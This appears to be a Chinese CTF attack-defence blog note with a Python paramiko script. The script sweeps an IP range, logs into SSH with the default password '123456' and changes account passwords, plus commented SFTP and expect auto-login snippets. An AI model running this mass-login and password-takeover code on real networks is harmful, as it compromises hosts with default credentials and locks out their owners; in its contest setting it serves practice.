ctf之AWD(1) ssh弱口令
批量修改ssh初始密碼
要點
passwd的--stdin參數ubuntu不支持,chpasswd命令需要root權限
echo "root" |passwd --stdin apache
- 更改密碼用
sh -c passwd
命令,不直接用passwd
- 控制初始登錄ssh的歡迎banner
- 控制收發包速度和
CRLF
,通過jupyter
快速調試 - git
paramiko
源碼 ,查看example和doc
git clone https://github.com/paramiko/paramiko.git
pexpect
庫的pexpect.spawn
在Windows不可用Python自動化運維:技術與最佳實踐:
https://github.com/sv4us/ebook/tree/master/python
python3 script
# -*- coding:utf-8 -*-
import paramiko
import time
import queue
'''
passwd的--stdin參數ubuntu不支持
chpasswd
joe:abcdef
echo "root" |passwd --stdin apache
'''
USER = ['root', 'apache', 'root1', 'ctf', 'student']
PASSWORD_SSH = '123456'
PASSWORD_NEW = 'aser1234..'
COLOR_GREEN = '\033[1;32;40m'
COLOR_RED = '\033[1;31;40m'
def get_ip(ip1, ip2):
ipaddr_queue = queue.Queue()
for i in range(int(ip1), int(ip2)):
full_ip = '192.168.232.' + str(i)
ipaddr_queue.put(full_ip)
return ipaddr_queue
def write_ip(lfile, data):
try:
f = open(lfile, 'w+')
f.write(data + ' ' + time.ctime() + '\n')
f.close()
except Exception as e:
print(COLOR_RED + '[-]:寫入失敗' + str(e))
def ssh_exec(ip, port):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname=str(ip), port=port, username=USER[1], password=PASSWORD_SSH)
command1 = 'curl ip.sb'
#command1 = 'echo %s|passwd --stdin %s' % (PASSWORD_NEW, USER[0])
stdin, stdout, stderr = ssh.exec_command(command1)
out, err = stdout.read(), stderr.read()
if out:
print(COLOR_GREEN + '[+]:' + str(ip) + '\n' + out.decode('utf-8').strip())
write_ip('d:/ssh_ip.txt', str(ip))
else:
print(COLOR_RED + '[-]: 命令執行失敗')
except paramiko.ssh_exception.AuthenticationException as e:
print(COLOR_RED + '[-]:' + str(ip) + '賬號密碼錯誤!')
pass
def ssh_invoke_shell(ip, port):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname=ip, port=port, username=USER[1], password=PASSWORD_SSH)
interact = ssh.invoke_shell()
interact.settimeout(10)
def send_recv(data):
interact.send(data)
time.sleep(0.5)
if interact.recv_ready():
print(interact.recv(1024).decode('utf-8'))
else:
print('recv failed')
send_recv('sh -c passwd\r')
send_recv(PASSWORD_SSH + '\r')
send_recv(PASSWORD_NEW + '\r')
send_recv(PASSWORD_NEW + '\r')
write_ip('d:/ssh_ip.txt', str(ip))
interact.shutdown(2) #0: 停止接收 1: 停止發送 2: 停止接收和發送數據
if interact.exit_status_ready():
print("EXIT :", interact.recv_exit_status())
else:
pass
except paramiko.ssh_exception.AuthenticationException as e:
print('[-]:' + '賬號密碼錯誤!')
def change_ssh(ip1, ip2):
tmp_queue = get_ip(ip1, ip2)
while tmp_queue.qsize() > 0:
try:
ip = tmp_queue.get_nowait()
#ssh_exec(ip, 22)
ssh_invoke_shell(ip, 22)
except Exception as e:
print(COLOR_RED + '[-]:' + 'error' + str(e))
pass
if __name__ == '__main__':
#change_ssh(129, 130)
change_ssh(141, 142)
'''
#sftp
transport = paramiko.Transport(('192.168.1.111',22))
transport.connect(username='root', password='123456')
sftp = paramiko.SFTPClient.from_transport(transport)
# 將/tmp/test.txt 上傳至服務器 /data/test.txt
sftp.put('/tmp/test.txt', '/data/test.txt')
# 將/data/test.txt 下載到本地 /tmp/a.txt
sftp.get('/data/test.txt', '/tmp/a.txt')
transport.close()
'''
##基於公鑰密鑰上傳下載
'''
private_key = paramiko.RSAKey.from_private_key_file('/root/.ssh/id_rsa')
transport = paramiko.Transport(('10.0.3.56', 22))
transport.connect(username='root', pkey=private_key)
sftp = paramiko.SFTPClient.from_transport(transport)
# 將/tmp/haha.txt 上傳至服務器 /tmp/a.txt
sftp.put('/tmp/haha.txt', '/tmp/a.txt')
# 將/tmp/a.txt 下載到本地 /root/a.txt
sftp.get('/tmp/a.txt', '/root/a.txt')
transport.close()
'''
'''
###自動ssh/scp腳本
如果需要從A,到B,然後才能夠到C,那麼需要ssh和scp兩次,是比較麻煩的。
ssh自動登錄:
#!/usr/bin/expect -f
set timeout -1
spawn ssh root@B
expect "password:"
send "pppppp\r"
expect "]*"
send "ssh root@C\r"
expect "password:"
send "pppppp\r"
interact
'''